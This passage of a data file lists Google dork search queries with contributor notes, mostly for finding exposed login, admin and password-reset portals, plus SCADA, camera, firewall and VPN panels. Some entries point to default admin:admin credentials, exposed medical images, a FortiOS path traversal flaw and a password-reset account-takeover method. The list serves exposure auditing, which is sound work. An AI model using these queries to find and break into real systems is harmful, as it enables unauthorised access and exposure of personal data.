"Application on AWS Elasticbeanstalk\r\n\r\n# Google Dork: inurl:.elasticbeanstalk.com/admin\r\n# Date: [4-11-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:Metabase inurl:/dash", "description": "Metabase Dashboard Queries\r\n\r\n# Google Dork: intitle:Metabase inurl:/dash\r\n# Date: [4-11-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:\"/password.php\" intitle:\"Forgot your password\"", "description": "Login Portal:\r\n\r\ninurl:\"/password.php\" intitle:\"Forgot your password\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/account/reset", "description": "Login Portal:\r\n\r\nsite:*/account/reset\r\nsite:*/auth/forgot_password\r\nsite:*/account/resetpassword\r\nsite:*/accountrecoveryendpoint/recoverypassword.do\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi-bin/luci intext:\"Authorization Required\"", "description": "Login Portal:\r\n\r\nsite:*/cgi-bin/luci intext:\"Authorization Required\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/auth_index.htm?lang=kr&loginvalue=0&port=0", "description": "Samsung DVR web viewer login portal:\r\n\r\nsite:*/auth_index.htm?lang=kr&loginvalue=0&port=0\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/Admin/Forget.php\"", "description": "Login Portal:\r\n\r\ninurl:\"/Admin/Forget.php\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/admin/password/reset", "description": "Login POrtal:\r\n\r\nsite:*/admin/password/reset\r\nsite:*/admin/password-recovery/\r\nsite:*/password_reset/new\r\ninurl:\"/pages/reset_password.php\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?title=Special:Userlogin\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?title=Special:Userlogin\"\r\ninurl:\"/index.php?title=Special:PasswordReset\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?content=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?content=login\"\r\ninurl:\"/index.php?content=forgot\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?p=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?p=login\"\r\ninurl:\"/index.php?p=password_reset\"\r\ninurl:\"/index.php?p=forgot\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?pageID=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?pageID=login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php/main/login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php/main/login\"\r\ninurl:\"/index.php/Main/Forgot_Password\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:odoo inurl:login \"powered by odoo\" \"manage databases\"", "description": "intitle:odoo inurl:login \"powered by odoo\" \"manage databases\"\r\n\r\nDan Kritzinger"}, {"dork": "inurl:login.jsp intitle:login", "description": "*Google Dork:* inurl:login.jsp intitle:login\r\n*Description:* Pages Containing Login Portals\r\n*Author:* shivaGprasadh"}, {"dork": "site:*/my.policy", "description": "#Author: MiningOmerta\r\n#Google Dork Submission\r\n#This takes you to some log-in pages, some to logged-out pages, and others to juicy info.\r\n\r\n\r\nsite:*/my.policy"}, {"dork": "intitle:\"TMSoft MyAuth Gateway 3\" -DOWNLOAD", "description": "Dork for search any pages of MyAuth software"}, {"dork": "intitle:MK-AUTH :: CONTEUDO RESTRITO -site:mk-auth.com.br", "description": "Dork for search any mkauth pages"}, {"dork": "inurl:10443/remote/login", "description": "Dork for find any pages with the FortiOS Path Traversal vulnerability"}, {"dork": "intext:\"civicplus\" \"Login\"", "description": "Login pages to government websites using CivicPlus\r\n\r\nZerconil"}, {"dork": "site:*/siteminderagent/forms/login.fcc", "description": "Login Portal:\r\n\r\nsite:*/siteminderagent/forms/login.fcc\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"Service provided by Horos.\"", "description": "# Google Dork : intext:\"Service provided by Horos.\"\r\n# Description: Find websites with medical information about people, such as x-rays. Some logins are without authentication.\r\n# Category : Files Containing Juicy Info\r\n# Date : 17/12/2019\r\n# Author : Leandro Naranjo\r\n# Social: @tw1_lea"}, {"dork": "inurl:/login.aspx site:com.tr intitle:y\u00f6netim", "description": "Google Dork : inurl:/login.aspx site:com.tr intitle:y\u00f6netim\r\n\r\nThis one is finding some important login panel in my country . You can\r\nchange \"y\u00f6netim\" to \"management\" on global searching."}, {"dork": "intitle:\"Pfsense - Login\"", "description": "Google Dork : intitle:\"Pfsense - Login\"\r\n\r\nThis dork found pfsense login panel.\r\n\r\nBerat \u0130\u015fler (root1x)"}, {"dork": "intitle:\"WHMCS - Login\" inurl:/admin/login.php", "description": "Google Dork : intitle:\"WHMCS - Login\" inurl:/admin/login.php\r\n\r\nThis dork finding some useful login page.\r\n\r\nBerat \u0130\u015fler (root1x)"}, {"dork": "intitle:\"WebSite X5 Manager\" inurl:/admin/login.php", "description": "Google Dork: intitle:\"WebSite X5 Manager\" inurl:/admin/login.php\r\nThis dork find some X5 website manager login page.\r\n\r\n\r\nBerat \u0130\u015fler (root1x)"}, {"dork": "inurl:admin/login.php?login= intitle:\"CMS\"", "description": "Google Dorks: \r\ninurl:admin/login.php?login= intitle:\"CMS\"\r\ninurl:admin/login.php?login= intitle:\"Dashboard\"\r\n\r\nThis dork finding some useful cms login page.\r\n\r\nBerat \u0130\u015fler (root1x)"}, {"dork": "intitle:\"Check Point - Login\"", "description": "intitle:\"Check Point - Login\"\r\n\r\nThis dork found checkpoint login panel.\r\n\r\nAuthor : Ismail Tasdelen"}, {"dork": "inurl:\"/webis/webis_login.html\"", "description": "inurl:\"/webis/webis_login.html\"\r\n\r\nThis dork found checkpoint login panel.\r\n\r\nAuthor : Ismail Tasdelen"}, {"dork": "intitle:\"Zabbix\" intext:\"username\" intext:\"password\" inurl:\"/zabbix/index.php\"", "description": "Zabbix Login Portal:\r\n\r\nintitle:\"Zabbix\" intext:\"username\" intext:\"password\"\r\ninurl:\"/zabbix/index.php\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?reconnect=1\"", "description": "Zabbix Login Portal:\r\n\r\ninurl:\"/index.php?reconnect=1\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\":8080/login\"", "description": "Login Portal:\r\n\r\ninurl:\":8080/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"LABVANTAGE Logon\"", "description": "Login Portal:\r\n\r\nintitle:\"LABVANTAGE Logon\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi/domadmin.cgi", "description": "Login Portal:\r\n\r\nsite:*/cgi/domadmin.cgi\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\":8080/login.jsp?os_destination=\"", "description": "Login Portal:\r\n\r\ninurl:\":8080/login.jsp?os_destination=\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"powered by codoforum\" inurl:\"/user/login\"", "description": "Find forum websites powered by\r\n\r\ncodoforum\r\n\r\nintext:\"powered by codoforum\" inurl:\"/user/login\"\r\nintext:\"Powered by Codoforum\""}, {"dork": "intitle:\"webview login\" alcatel lucent", "description": "Alcatel-Lucent devices\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "site:*/AdminPanel.php", "description": "Login Portal:\r\n\r\nsite:*/AdminPanel.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:memberlogin.php", "description": "Login Portal:\r\n\r\ninurl:memberlogin.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Sign in\" site:*/idaas/", "description": "Login Portal:\r\n\r\nintitle:\"Sign in\" site:*/idaas/\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:check_mk/login.py", "description": "Dork for search Checkmk login pages:\r\n\r\nCheckmk has long been available as an open source IT monitoring solution, supported by a large user community\r\n\r\nweb:https://checkmk.com/\r\n[https://checkmk.com/images/apple-touch-icon.png]\r\nInfrastructure\r\n & Application Monitoring | checkmk\r\nCheckmk\r\n is a leading tool for Infrastructure & Application Monitoring. Simple configuration, scalable, flexible. Open Source and Enterprise.\r\ncheckmk.com\r\n\r\n\r\nAuthor:\r\n\r\nUsmanAliMaan"}, {"dork": "intitle:Check_MK Multisite Login", "description": "Dork for search Checkmk:\r\n\r\nCheckmk has long been available as an open source IT monitoring solution, supported by a large user community\r\n\r\n\r\nAuthor:\r\n\r\nUsmanAliMaan"}, {"dork": "intext:\"Rubicon Communications, LLC (Netgate)\" intitle:\"Login\"", "description": "This dork found Pfsense Login Portals.You can modify you your need or\r\ncountry extension.\r\n\r\nGoogle Dork : intext:\"Rubicon Communications, LLC (Netgate)\" intitle:\"Login\"\r\n\r\nBerat Isler ( root1x)"}, {"dork": "intitle:\"RabbitMQ Management\" inurl:15672", "description": "RabbitMQ Dashboard Logins\r\n\r\n# Google Dork: intitle:\"RabbitMQ Management\" inurl:15672\r\n# Date: [6-2-2020]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:VMware inurl:5480", "description": "VMware Appliance Management Logins\r\n\r\n# Google Dork: intitle:VMware inurl:5480\r\n# Date: [6-2-2020]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:\"saw.dll\" AND intitle:\"Sign In\"", "description": "# Dork #\r\n\r\ninurl:\"saw.dll\" AND intitle:\"Sign In\"\r\n\r\nLogin Portals."}, {"dork": "intitle:VMware intext:\"VMware, Inc. All rights reserved.\" AND \"Powered by VMware Studio\"", "description": "AUTHOR: CANCOM #RedTeam\r\n\r\n@ItsKarl0z\r\n\r\n++ VMware Studio Login ++\r\n\r\nintitle:VMware intext:\"VMware, Inc. All rights reserved.\" AND \"Powered by VMware Studio\"\r\nintitle:vSphere intext:\"Powered by VMware Studio\""}, {"dork": "inurl:\"auth.html\" intitle:\"SonicWall\"", "description": "Find sonicwall appliance login pages\r\n\r\n-- \r\n\r\n*Hilary Soita.*"}, {"dork": "inurl:/_layouts/userdisp.aspx?id= intext:password", "description": "This dork found various login portals:\r\n\r\ninurl:/_layouts/userdisp.aspx?id= intext:password\r\n\r\n\r\n*Wethenorthcvv"}, {"dork": "intitle:\"Pentaho User Console - Login\"", "description": "This dork finds Pentaho login page.\r\n\r\nintitle:\"Pentaho User Console - Login\"\r\ninurl:/pentaho/Login\r\n\r\n- Pomodori"}, {"dork": "intext:\"Welcome to JIRA\" \"Powered by a free Atlassian Jira community\"", "description": "intext:\"Welcome to JIRA\" \"Powered by a free Atlassian Jira community\"\r\n\r\nBy\r\n\r\nSagar Banwa"}, {"dork": "intext:OpenCart inurl:index.php?route=common/dashboard", "description": "Using this Dork we can find Admin panels of hosted OpenCart.\r\n\r\nhttps://www.opencart.com/\r\nhttps://www.linkedin.com/in/usmanalimaan/\r\n\r\nA free shopping cart system. OpenCart is an open source PHP-based online e-commerce solution.\r\nwww.opencart.com"}, {"dork": "inurl:\"Orion/Login.aspx?ReturnUrl=\"", "description": "Find solarwinds login pages\r\n\r\n*Hilary Soita.*"}, {"dork": "intitle:\"Log In JIRA\" inurl:\"8080:/login.jsp\"", "description": "The following dork gives you an extensive search result for login pages of\r\nJIRA\r\n\r\nintitle:\"Log In JIRA\" inurl:\"8080:/login.jsp\"\r\n\r\nBy Juveria Banu"}, {"dork": "intitle:\"WEB SERVICE\" intext:\"Please install plugins first!\"", "description": "Multiple Vendor CCTV Login Web Page\r\n\r\nintitle:\"WEB SERVICE\" intext:\"Please install plugins first!\"\r\n\r\nAuthor : Zulfiqar Wardi (yunaranyancat)"}, {"dork": "inurl:\"/jw/web/login\"", "description": "Joget Workflow Enterprise framework login pages\r\n\r\ninurl:\"/jw/web/login\"\r\n\r\nAuthor: Zulfiqar Wardi (yunaranyancat)"}, {"dork": "inurl:\"/login.htm?page=\" intext:\"Loading login page\"", "description": "Blue Iris Cam Login Page\r\n\r\ninurl:\"/login.htm?page=\" intext:\"Loading login page\"\r\n\r\nAuthor : Zulfiqar Wardi (yunaranyancat)"}, {"dork": "inurl:\"serverpush.htm\" intext:\"Real-time\"", "description": "\"Real-time IP Camera Monitoring System\" Login Page\r\n\r\ninurl:\"serverpush.htm\" intext:\"Real-time\"\r\n\r\nAuthor : Zulfiqar Wardi (yunaranyancat)"}, {"dork": "inurl:manager/login", "description": "Provides manager login pages, which are more or less meant for the admins.\r\n\r\nBy Juveria Banu."}, {"dork": "intitle:\"Outlook Web App\" inurl:\"/owa/auth\" logon ext:aspx", "description": "-- \r\n*Regards,*\r\n*Ubaid Ahmed*\r\n\r\n\r\n*https://UbaidAhmed.com *"}, {"dork": "intext:\"please enter your username and password\" inurl:login filetype:php", "description": "Category: Pages Containing Login Portals\r\n\r\n\r\nNicholas Doropoulos"}, {"dork": "intext:\"Please enter your new password\" inurl:login filetype:php", "description": "# Google Dork: intext:\"Please enter your new password\" inurl:login\r\nfiletype:php\r\n\r\n# By using this dork, pages containing login portals can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/LoginPanel.aspx", "description": "# Google Dork: site:*/LoginPanel.aspx\r\n\r\n# This dork found Login Panels.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Emre DURMAZ"}, {"dork": "site:*/AdminPanel.aspx", "description": "# Google Dork: site:*/AdminPanel.aspx\r\n\r\n# This dork found Admin Panels.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Emre DURMAZ"}, {"dork": "intext:\"Welcome Admin\"", "description": "# Google Dork: intext:\"Welcome Admin\"\r\n\r\n# By using this dork, pages containing various login portals can be found.\r\n\r\n# Date: 26/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/Citrix/storeweb", "description": "Category: Pages Containing Login Portals\r\n\r\nNicholas Doropoulos"}, {"dork": "intext:\"This computer system is the property of\" -error", "description": "Category: Pages Containing Login Portals\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:/forgotpassword intext:\"enter username and email\"", "description": "# Google Dork: inurl:/forgotpassword intext:\"enter username and email\"\r\n\r\n# The search results found from this dork, are potentially vulnerable sites\r\nto account takeover. If attacker inserts victim's username along with\r\nattacker's email address, than attacker might receive password reset link\r\nor code for the target user on his(attacker) own mail. Or, if attacker\r\nattempts password reset for his own account, then intercept and modifies\r\nthe http request body with victim credentials(i.e. username, email), than\r\nhe might successfully reach victim's password reset page. Using these two\r\nmethods, attacker might be able to takeover any user account.\r\n\r\n# Date: 25/03/2020\r\n\r\n# Author: Rafin Rahman Chowdhury"}, {"dork": "intext:\"Welcome! Log in or create an account to continue.\"", "description": "# Google Dork: intext:\"Welcome! Log in or create an account to continue.\"\r\n\r\n# By using this dork, various web pages containing login portals can be\r\nfound.\r\n\r\n# Date: 27/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:8080/webinterface intitle:\"crushftp\"", "description": "# Google Dork: inurl:8080/webinterface intitle:\"crushftp\"\r\n\r\n# By using this dork, various web interfaces for the Crush FTP containing\r\nlogin portals can be found.\r\n\r\n# Date: 27/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "site:*/retrieve.php", "description": "Login Portal:\r\n\r\nsite:*/retrieve.php\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "site:*/account-recovery.html", "description": "Login Portal:\r\n\r\nsite:*/account-recovery.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/retrieve-password", "description": "Login Portal:\r\n\r\nsite:*/retrieve-password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/resetpass.php", "description": "Login Portal:\r\n\r\nsite:*/resetpass.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/reminder_password", "description": "Login Portal:\r\n\r\nsite:*/reminder_password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/changePassword.php", "description": "Login portal:\r\n\r\nsite:*/changePassword.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/*/pwdrecovery.php", "description": "Login PORTAL:\r\n\r\nsite:*/*/pwdrecovery.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/adfs/ls/ intitle:\"Sign In\"", "description": "Login Portal:\r\n\r\nsite:*/adfs/ls/ intitle:\"Sign In\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/signup/password.php", "description": "Login Portal:\r\n\r\nsite:*/signup/password.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/requestpassword.*", "description": "Login Portal:\r\n\r\nsite:*/requestpassword.*\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/membersarea intitle:\"login\"", "description": "Login Portal:\r\n\r\nsite:*/membersarea intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/user/forgot", "description": "Login Portal:\r\n\r\nsite:*/user/forgot\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/JIRA/login", "description": "JIRA Login page using\r\n\r\nsite:*/JIRA/login"}, {"dork": "site:*/admin/password.php", "description": "# Google Dork: site:*/admin/password.php\r\n\r\n#Date: 31/03/2020\r\n\r\n#Author: ASHIK KUNJUMON"}, {"dork": "inurl:r51173 intext:\"Keep me logged in\"", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "inurl:/global-protect/login.esp", "description": "# Dork #\r\n\r\ninurl:/global-protect/login.esp\r\n\r\nLogin Portals."}, {"dork": "inurl:/sslvpn/Login/Login", "description": "# Dork #\r\n\r\ninurl:/sslvpn/Login/Login\r\n\r\nLogin Portals."}, {"dork": "inurl:main_login.html intitle:Netgear", "description": "Exploit Title: Netgear Switch login pages.\r\nGoogle dork: inurl:main_login.html intitle:Netgear\r\nDate:4/1/2020\r\nExploit author: techjohnny"}, {"dork": "intext:\"Any time & Any where\" intext:\"Username\" intext:\"Password\" intext:login intext:\"View: Mobile | PC\"", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "site:*/request-new-password", "description": "Login Portal:\r\n\r\nsite:*/request-new-password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/password_lost.php", "description": "Login Portal:\r\n\r\nsite:*/password_lost.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/auth.php", "description": "Login Portal:\r\n\r\nsite:*/auth.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/auth.php?forgot_password=yes\"", "description": "Login Portal:\r\n\r\ninurl:\"/auth.php?forgot_password=yes\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:account.*.*/recovery", "description": "Login Portal:\r\n\r\nsite:account.*.*/recovery\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/PassRecover", "description": "Login Portal:\r\n\r\nsite:*/PassRecover\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/user/forgotpass", "description": "Login Portal using\r\n\r\nsite:*/user/forgotpass"}, {"dork": "site:*/signup/pass", "description": "Login Portal using\r\n\r\nsite:*/signup/pass"}, {"dork": "site:*/test/login", "description": "# Google Dork: site:*/test/login\r\n\r\n# By using this dork, pages containing various login portals can be found.\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"login\" intitle:\"iot login\"", "description": "# Google Dork: \"login\" intitle:\"iot login\"\r\n\r\n# Pages containing various IoT () login portals can be found.\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"login.html\" intitle:\"d-link\"", "description": "Google Dork: inurl:\"login.html\" intitle:\"d-link\"\r\nDescription: Pages containing d-link routers login pages.\r\nAuthor: Abhi Chitkara"}, {"dork": "site:*/lost-password/", "description": "Login Portal:\r\n\r\nsite:*/lost-password/\r\n\r\nReza Abasi(Turku)"}, {"dork": "\"Welcome to Sentry, please log in:\"", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "inurl:/DeclaranetPlusWebapp/ intext:Entrar", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "intext:\"Welcome Site/User Administrator\"", "description": "# Google Dork: intext:\"Welcome Site/User Administrator\"\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "site:.\"atlassian.net\" \"Log in to your account\"", "description": "Exposes login portals that may expose internal service desks.\r\n\r\nsite:.\"atlassian.net\" \"Log in to your account\"\r\nsite:\".atlassian.net\" / \"service desk/customer/user/login\""}, {"dork": "inurl:8080/portal/pda/?force.login=yes", "description": "# Google Dork: inurl:8080/portal/pda/?force.login=yes\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:start.swe?SWECmd", "description": "This dork is for exposing Siebel login portals. I consider it a serious\r\nflaw as Siebel uses anonymous users and you can actually view content if by\r\naccident responsibilities are assigned to this anonymous user."}, {"dork": "inurl:/8080/login.html", "description": "# Google Dork: inurl:/8080/login.html\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 23/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"The default username and password is admin:admin\" intitle:Login OR inurl:login.php", "description": "# Google Dork: \"The default username and password is admin:admin\"\r\nintitle:Login OR inurl:login.php\r\n\r\n# Default user name and password admin:admin.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"/dynamic/password-reset.html\"", "description": "Login Portal:\r\n\r\ninurl:\"/dynamic/password-reset.html\"\r\ninurl:\"/dynamic/login.html\" intitle:\"Linksys\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Fortinet - Login\"", "description": "# Google Dork: intitle:\"Fortinet - Login\"\r\n\r\n# Pages containing Login Portals.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:/dynamic/login.html intext:\"Linksys Smart Wi-Fi Sign In\"", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "intitle:\"OpenMeetings\" intext:\"Username or mail address\"", "description": "Dork: intitle:\"OpenMeetings\" intext:\"Username or mail address\"\r\nInfo: Apache OpenMeetings login portals\r\n\r\nAuthor: M. Cory Billington (@_th3y)"}, {"dork": "inurl:userportal/webpages/myaccount/login.jsp", "description": "Juicy information (Firewall Login)\r\n\r\nMalkit Singh"}, {"dork": "site:*/dana-na/auth/welcome.cgi?p=rolelogo", "description": "Author: MiningOmerta\r\n\r\nFinds some pretty sensitive login portals.\r\n\r\nhttps://google.com/search?q=site:*/dana-na/auth/welcome.cgi?p=rolelogo\r\n\r\nsite:*/dana-na/auth/welcome.cgi?p=rolelogo"}, {"dork": "site:*/asana/login", "description": "Find the Asana login panel using\r\n\r\nDORK: site:*/asana/login\r\n\r\n~ Irshad Ahamed"}, {"dork": "site:*/login/pass", "description": "Password reset portals\r\n\r\nDORK: site:*/login/pass\r\n\r\n~ Irshad Ahamed"}, {"dork": "site:*/Drupal/login", "description": "Name [Adarsh Lal]\r\nGoogle Dork [site:*/Drupal/login]"}, {"dork": "\"index of\" \"adminer.php\"", "description": "Dork: \"index of\" \"adminer.php\"\r\nDescription: This Google dork can be used to discover servers with\r\nadminer.php files which can be accessed to try and log in to the database.\r\nAuthor: Jinson Varghese Behanan (@JinsonCyberSec)\r\nAuthor Homepage: https://www.jinsonvarghese.com"}, {"dork": "site:*/auth/forgot", "description": "Login portals:\r\n\r\nsite:*/auth/forgot\r\nsite:*/auth/password\r\nsite:*/auth/login intitle:\"sign in\"\r\nsite:*/auth/password/request\r\nsite:*/auth/restore\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/emptyView4.html", "description": "#Author: MiningOmerta\r\n#Finds outdated and publicly exposed Sonicwall Firewalls. If one erases emptyView4.html once at the website and instead uses\r\n# the less indexed http://site/auth1.html, it will typically show the Perimeter Firewall login page\r\n# from the link on that page you can navigate to https://site/sslvpnLogin.html which will usually to domain VPN login with domain(s) name listed in the dropdown.\r\n\r\nDork:\r\n\r\ninurl:/emptyView4.html"}, {"dork": "intext:\"Launch FortiClient\" and \"Please Login\"", "description": "This dork found FortiClient Login Portals.\r\n\r\nGoogle Dork: intext:\"Launch FortiClient\" and \"Please Login\"\r\n\r\nAuthor: Berat ISLER (root1x)"}, {"dork": "inurl:admin.aspx", "description": "Dork: inurl:admin.aspx\r\nDescription: This google dork lists out asp.net admin pages for web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:adminlogin.asp", "description": "# Google Dork: \r\ninurl:adminlogin.asp\r\ninurl:administratorlogin.asp\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:enter.php?phpbb_root_path=", "description": "# Google Dork: inurl:enter.php?phpbb_root_path=\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:client_id=", "description": "# Google Dork: inurl:client_id=\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"ShowIt-Admin\"", "description": "# Google Dork: intitle:\"ShowIt-Admin\"\r\n\r\n# ShowIt configuration panels.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"You need to be logged in to see your course progress.\"", "description": "I want to share a google dork which helps to reveal all the website using wp-courseware plugin. and it reveals website having course hosted on there website.\r\n\r\nGoogle Dork: \"You need to be logged in to see your course progress.\"\r\n\r\nDate: [23/05/2020] \r\nAuthor: Nitesh kumar pandey\r\nVendor Homepage: https://flyplugins.com/wp-courseware/"}, {"dork": "inurl:pentaho/Login", "description": "Find pentaho login portals\r\n\r\n*Hilary Soita.*"}, {"dork": "inurl:login.jsf", "description": "Dork:- inurl:login.jsf\r\n\r\nDescription:-\r\nThis Dork id used to find the Login portal of web page developed under\r\n java based technology login web page.\r\n\r\nAuthor:- Manish Kumar"}, {"dork": "intitle:\"Ice Hrm Login\" intext:\"Forgot Password\"", "description": "# Google Dork: intitle:\"Ice Hrm Login\" intext:\"Forgot Password\"\r\n\r\n# Pages containing login portals, where some of them use weak passwords,\r\nlike admin/admin.\r\n\r\n# Date: 25/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"forgotpassword.jsf\"", "description": "Dork: inurl:\"forgotpassword.jsf\"\r\nDescription: This google dork lists out java server pages based forgot\r\npassword forms.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:forgotpassword.asp", "description": "* Google Dork: *\r\n\r\ninurl:forgotpassword.asp\r\n\r\n*Various pages containing forgot password portals.*\r\n\r\n*AUTHOR : ANJALI PRAKASH *"}, {"dork": "intitle:\"HP System Management Homepage\" inurl:cpqlogin", "description": "# Google Dork: intitle:\"HP System Management Homepage\" inurl:cpqlogin\r\n\r\n# Description: Find HP System Management Homepage.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "intitle:\"ASUS\" AND inurl:\"Main_Login.asp\" AND intext:\"router account\" -asus.com", "description": "# Google Dork: intitle:\"ASUS\" AND inurl:\"Main_Login.asp\" AND intext:\"router\r\naccount\" -asus.com\r\n\r\n# Description: Find ASUS router login page for different versions.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "inurl:\"forgotpassword.aspx\"", "description": "Dork:- inurl:\"forgotpassword.aspx\"\r\n\r\nDescription:-\r\nThis google dork lists out out asp.net server page based forgot password\r\npage.\r\n\r\nAuthor:- Manish Kumar"}, {"dork": "inurl:login_admin \"admin\"", "description": "# Title: Find admin login panels\r\n# Google Dork: inurl:login_admin \"admin\"\r\n# Date : 27/05/2020\r\n# Author: Ritik Sahni"}, {"dork": "inurl:adminlogin.php", "description": "Dork: inurl:adminlogin.php\r\nDescription: This google dork lists out php admin login pages for a web\r\nserver\r\nAuthor: Abhi Chitkara"}, {"dork": "site:*/joomla/login", "description": "Login page of websites developed in Joomla\r\n\r\nGoogle Dork: site:*/joomla/login\r\n\r\nAuthor: Mayank Chandelkar"}, {"dork": "inurl:forgotpassword.htm", "description": "*# Google Dork:*\r\n\r\n* inurl:forgotpassword.htmDescription:- Various pages containing\r\nforgot password portals*\r\n\r\n*# Author: Janmejaya Swain\r\n# Date: 28-May-2020\r\n# Linkedin:\r\nhttps://www.linkedin.com/in/janmejayaswainofficial"}, {"dork": "\"login\" intitle:\"*board login\"", "description": "# Google Dork: \"login\" intitle:\"*board login\"\r\n\r\n# Various pages containing board login portals.\r\n\r\n# Date: 28/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"login\" intitle:\"*scada login\"", "description": "# Google Dork: \"login\" intitle:\"*scada login\"\r\n\r\n# Various SCADA login portals.\r\n\r\n# Date: 28/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"login\" intitle:\"*dashboard login\"", "description": "# Google Dork: \"login\" intitle:\"*dashboard login\"\r\n\r\n# Various Dashboard login portals.\r\n\r\n# Date: 28/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:resetpassword.aspx", "description": "Dork:\r\ninurl:resetpassword.aspx\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:\"resetpassword.asp\"", "description": "Dork:\r\ninurl:\"resetpassword.asp\"\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:\"passwordreset.php\"", "description": 